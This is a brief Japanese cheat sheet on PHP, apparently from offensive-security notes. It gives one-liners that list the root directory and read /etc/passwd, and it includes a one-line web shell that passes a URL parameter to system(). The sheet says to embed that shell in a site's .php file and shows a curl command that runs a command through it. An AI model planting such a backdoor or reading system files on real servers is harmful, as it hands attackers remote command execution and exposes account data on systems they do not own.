PHP

基本

phpを対話シェルで起動

$ php -a

よく使うコード

ディレクトリをリスト

<?php print_r(scandir("/")); ?>

ファイルを表示

<?php print_r(readfile("/etc/passwd")); ?>

Webshell

以下をウェブサイト内の.phpに埋め込む。

<?php system($_GET['cmd']) ?>

以下のようにして使う。

$ curl -s http://example.com/webshell.php?cmd=id